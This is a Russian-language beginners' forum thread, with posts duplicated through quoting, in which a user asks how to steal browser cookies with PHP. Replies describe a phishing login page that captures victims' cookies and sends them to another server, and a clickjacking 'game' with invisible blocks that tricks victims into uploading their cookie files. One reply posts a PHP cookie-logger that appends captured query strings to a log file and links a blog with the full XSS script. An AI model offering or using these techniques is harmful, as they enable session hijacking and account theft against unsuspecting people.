Обучение/Помощь новичкам | куки
Можно ли "воровать" куки через пхп скрипт? Кто знает
Украсть*
DELETED
14 октября 2017, в 19:28
Delete
________
посл. ред. 14.10.2017 в 19:28; всего 1 раз(а); by Onmen
Onmen (14.10.2017 в 19:28)
Не слышал о таком, но скорее не php, а JS, думаю реально, но нужны руки, и знание работы браузеров
Не слышал о таком, но скорее не php, а JS, думаю реально, но нужны руки, и знание работы браузеров
Для новичков трудно будет да, хмм
Делаешь фишинговую страницу, к примеру страница входа в соц сети с кнопкой "вход" устанвливаешь туда скрипт жертва нажимает на кнопку срабатывает скрипт и сохраняются на фишиговом сайте либо отправляются на другой ип при определенной настройке. Не всегда срабатывает если к примеру у жертвы в браузере стоит плагин "No script".
Или подобное
Можно замутить типо игры (перенести картинки с одной стороны на другую), а под картинками будут скрытые блоки (opacity: 0) Один блок, который открывает директорию, в которой лежат ее куки. Второй блок, загрузки файла на ваш сервер.
Т.О жертва не понимая вместе с картинкой перетаскивает свои куки вам.
________
посл. ред. 14.10.2017 в 19:34; всего 1 раз(а); by 168694660
Или подобное
Можно замутить типо игры (перенести картинки с одной стороны на другую), а под картинками будут скрытые блоки (opacity: 0) Один блок, который открывает директорию, в которой лежат ее куки. Второй блок, загрузки файла на ваш сервер.
Т.О жертва не понимая вместе с картинкой перетаскивает свои куки вам.
________
посл. ред. 14.10.2017 в 19:34; всего 1 раз(а); by 168694660
168694660 (14.10.2017 в 19:31)
<?
$uid=urldecode($_SERVER['QUERY_STRING']);
$fp=fopen("log.txt","a");
fputs($fp,"$uidn");
fclose($fp);
?>
<?
$uid=urldecode($_SERVER['QUERY_STRING']);
$fp=fopen("log.txt","a");
fputs($fp,"$uidn");
fclose($fp);
?>
http://xssvulns.blogspot.ru/2012/02/cookie.html?m=1 полный скрипт можешь написать js т.дт.д
с оперы на пк на изи можно ...
User_kz (14.10.2017 в 19:33)
168694660 (14.10.2017 в 19:31)
<?
$uid=urldecode($_SERVER['QUERY_STRING']);
$fp=fopen("log.txt","a");
fputs($fp,"$uidn");
fclose($fp);
?>
http://xssvulns.blogspot.ru/2012/02/cookie.html?m=1 полный скрипт можешь написать js т.дт.д
168694660 (14.10.2017 в 19:31)
<?
$uid=urldecode($_SERVER['QUERY_STRING']);
$fp=fopen("log.txt","a");
fputs($fp,"$uidn");
fclose($fp);
?>
http://xssvulns.blogspot.ru/2012/02/cookie.html?m=1 полный скрипт можешь написать js т.дт.д
Пост изменил . на сайте все подробно описано